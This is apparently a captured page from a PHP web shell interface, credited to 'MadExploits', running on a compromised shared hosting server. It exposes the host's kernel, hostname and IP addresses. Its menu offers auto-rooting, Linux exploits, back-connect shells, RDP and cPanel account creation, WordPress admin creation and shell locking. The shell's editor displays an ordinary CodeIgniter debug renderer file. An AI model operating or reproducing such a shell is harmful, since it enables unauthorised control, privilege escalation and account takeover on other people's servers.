Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.36
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
public_html /
system /
Debug /
Kint /
[ HOME SHELL ]
Name
Size
Permission
Action
RichRenderer.php
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RichRenderer.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter\Debug\Kint; use Kint\Renderer\RichRenderer as KintRichRenderer; /** * Overrides RichRenderer::preRender() for CSP */ class RichRenderer extends KintRichRenderer { public function preRender() { $output = ''; if ($this->pre_render) { foreach (self::$pre_render_sources as $type => $values) { $contents = ''; foreach ($values as $v) { $contents .= $v($this); } if (! \strlen($contents)) { continue; } switch ($type) { case 'script': $output .= '<script {csp-script-nonce} class="kint-rich-script">' . $contents . '</script>'; break; case 'style': $output .= '<style {csp-style-nonce} class="kint-rich-style">' . $contents . '</style>'; break; default: $output .= $contents; } } // Don't pre-render on every dump if (! $this->force_pre_render) { self::$needs_pre_render = false; } } $output .= '<div class="kint-rich'; if ($this->use_folder) { $output .= ' kint-file'; if (self::$needs_folder_render || $this->force_pre_render) { $output = $this->renderFolder() . $output; if (! $this->force_pre_render) { self::$needs_folder_render = false; } } } $output .= '">'; return $output; } }
Close